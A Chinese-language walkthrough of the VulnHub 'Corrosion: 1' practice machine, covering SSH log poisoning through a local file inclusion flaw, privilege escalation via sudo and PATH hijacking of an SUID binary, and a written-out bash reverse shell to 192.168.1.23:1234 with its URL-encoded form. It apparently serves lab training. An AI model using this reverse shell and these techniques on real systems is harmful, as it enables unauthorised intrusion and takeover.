一、环境搭建

靶场下载地址：http://www.vulnhub.com/entry/corrosion-1,730/，使用vm打开，配置kali和靶场处于同一个网络。

二、信息收集

主机发现

主机扫描

目录扫描

猜测需要更改ssh日志/var/log/auth.log文件，该文件中记录ssh登录失败的用户名，可以使用一句话木马来登录ssh，然后使用文件包含漏洞来包含该文件，达到执行一句话木马的目的。

FUZZ参数

文件包含漏洞

三、漏洞利用

SSH日志投毒

SSH登录失败的用户名密码会保存在ssh日志/var/log/auth.log文件中，可以使用一句话木马来登录ssh，然后利用randylogs.php中的LFI漏洞来包含/var/log/auth.log达到执行一句话木马的目的。

反弹SHELL

bash -c 'bash -i >& /dev/tcp/192.168.1.23/1234 0>&1'
url编码
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.23%2F1234%200%3E%261%27

四、内网信息收集

五、提权

SUDO滥用

手动写一个用来提权的easysysinfo.c文件，然后编译到/home/randy/tools/easysysinfo中，利用sudo执行来提权。

SUID滥用

Easysysinfo有suid位，可以用来提权，猜测easysysinfo是由压缩包中easysysinfo.c编译得来而来，查看源码得知cat未使用绝对路径，所以可以手动增添一个cat用来提权，修改环境变量$PATH使easysysinfo执行我们写的cat。